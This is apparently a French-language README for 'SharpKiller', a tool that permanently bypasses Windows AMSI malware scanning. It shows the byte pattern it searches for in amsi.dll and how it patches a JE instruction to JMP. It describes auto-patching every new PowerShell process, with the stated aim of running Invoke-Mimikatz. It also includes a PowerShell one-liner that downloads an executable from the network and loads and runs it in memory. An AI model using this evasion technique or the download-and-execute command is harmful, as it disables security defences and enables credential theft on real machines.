
Bypass AMSI permanent par @ZeroMemoryEx porté vers .NET Framework 4.8
Bypass AMSI à vie AMSI-Killer par @ZeroMemoryEx porté vers .NET Framework 4.8.
[ x ] - Analyse en direct des nouveaux processus powershell toutes les 0.5 secondes -> Corrige automatiquement les nouvelles instances powershell
nous obtenons l'adresse exacte de l'instruction de saut en recherchant le premier octet de chaque instruction ; cette technique est efficace même face à des mises à jour ou modifications de l'ensemble de données cible.
par exemple :
| 48:85D2 | test rdx, rdx |
| 74 3F | je amsi.7FFAE957C694 |
| 48 : 85C9 | test rcx, rcx |
| 74 3A | je amsi.7FFAE957C694 |
| 48 : 8379 08 00 | cmp qword ptr ds : [rcx + 8] , 0 |
| 74 33 | je amsi.7FFAE957C694 |
le motif de recherche sera comme ceci :
{ 0x48,'?','?', 0x74,'?',0x48,'?' ,'?' ,0x74,'?' ,0x48,'?' ,'?' ,'?' ,'?',0x74,0x33}

Le programme teste la valeur de RDX contre elle-même. Si la comparaison donne 0, le programme effectue un saut pour revenir. Sinon, le programme évalue l'instruction suivante

nous ne pouvons pas exécuter "Invoke-Mimikatz"

nous corrigeons le premier octet et le changeons de JE à JMP pour qu'il retourne directement


maintenant nous pouvons exécuter "Invoke-Mimikatz"



$url = "https://github.com/S1lkys/SharpKiller/releases/download/1.1/Sharp-Killer.exe"; $cli = New-Object System.Net.WebClient; $sk=[System.Reflection.Assembly]::Load([byte[]]( $cli.DownloadData($url)));$vars = New-Object System.Collections.Generic.List[System.Object];$BindingFlags= [Reflection.BindingFlags] "NonPublic,Static";$sk.EntryPoint.Invoke($null,@(,$passed));
Si vous avez déjà vu ce message et vous êtes demandé ce qu'il signifie - bienvenue dans l'interface AMSI .NET ! :-)
Exception calling "Load" with "1" argument(s): "Could not load file or assembly '288768 bytes loaded from Anonymously Hosted DynamicMethods Assembly, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. An attempt was made to load a program with an incorrect format."